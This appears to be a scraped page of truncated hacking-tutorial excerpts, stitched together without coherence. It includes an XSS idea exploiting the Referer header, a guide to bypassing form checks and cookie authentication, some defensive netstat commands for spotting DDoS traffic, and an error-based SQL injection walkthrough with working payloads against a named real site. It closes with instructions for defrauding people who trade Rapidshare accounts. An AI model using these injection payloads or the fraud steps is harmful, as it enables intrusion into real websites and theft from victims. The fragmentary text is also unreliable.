another way for create xss
similar to the XAS (exploiting header request)

var AdBrite_Title_Color = ‘FFFF66′;
var AdBrite_Text_Color = ‘FFFFCC’;
var AdBrite_Background_Color = ‘000000′;
var AdBrite_Border_Color = ‘CCCCCC’;
var AdBrite_URL_Color = ‘FFFFCC’;
try{var AdBrite_Iframe=window.top!=window.self?2:1;var AdBrite_Referrer=document.referrer==”?document.location:document.referrer;AdBrite_Referrer=encodeURIComponent(AdBrite_Referrer);}catch(e){var AdBrite_Iframe=”;var AdBrite_Referrer=”;}

document.write(String.fromCharCode(60,83,67,82,73,80,84));document.write(’ src=”http://ads.adbrite.com/mb/text_group.php?sid=966454&zs=&ifr=’+AdBrite_Iframe+’&ref=’+AdBrite_Referrer+’” type=”text/javascript”>’);document.write(String.fromCharCode(60,47,83,67,82,73,80,84,62));

Well we will discuss about that here now ..
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/search?q=http%3A%2F%2Fwww.cnil.fr%2Findex.php%3Fid%3D123&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok
the referer is used by much webmaster for tracking visitor
it is for that which solutions exists for not the webmaster knows from which site you come
example: http://anonym.to/en.html
We just …

This tutorial is an overview of how javascript can be used to bypass simple/advanced html forms and how it can be used to override cookie/session authentication.
SIMPLE HTML FORMS
1. Bypassing Required Fields
Surely you have met a webpage that requires you to fill all fields in a form in order to submit it. It is possible to bypass these types of restrictions on any webpage. If you take a look at the webpage’s source and follow it down to the form’s code, you will notice the onsubmit form attribute. Hopefully by this …

Because a null-route to an ip is not a solution, it is a kludge.
1) it is based on real attacks.
2) there is not anything of theory, single part practice.
A—>Detecting the attack
1) using the command netstat
netstat -an | grep :80 | sort
netstat -n -p | grep SYN_REC | awk ‘{print $5}’ | awk -F: ‘{print $1}’
netstat -n -p|grep SYN_REC | wc -l
netstat -lpn|grep :80 |awk ‘{print $5}’|sort
netstat -an | grep :80 | awk ‘{ print $5 }’ | awk -F: ‘{ print $1 }’ | sort | uniq -c | sort …

Today , i will write a little tutorial for you:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.
/ListByCategory.asp, line 25
and 1=convert(int,system_user)-
http://amboi.com/ListByCategory.asp?CatID=111%20and%201=convert(int,system_user)-
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘DBAdmin’ to a column of data type int.
/ListByCategory.asp, line 25
and 1=convert(int,(select top 1 table_name from information_schema.tables))-
http://amboi.com/ListByCategory.asp?CatID=111%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e09′
[Microsoft][ODBC SQL Server Driver][SQL Server]SELECT permission denied on object ’sysobjects’, database ‘Auction’, owner ‘dbo’.
/ListByCategory.asp, line 25 …

Important:
When Creating MoneyBookers ID Remember the Birthday they require it when sending money
First Off search for a rapidshare buyer or seller
There search up Rapidshare accounts. You will find 100’s of guys selling and as well as buying. Pick your Victim
Golden Rapidshare Rules:
Quote:
1. If person selling accounts its always money first
2. If person Buying accounts its always Accounts first
1. They Buy converted accounts that is Converted 10ks 20ks
2. Add the dealer in ur Y!M or w/e client you use for chatting
3. Tell him as follows:
Hello I am selling Legal 1 month …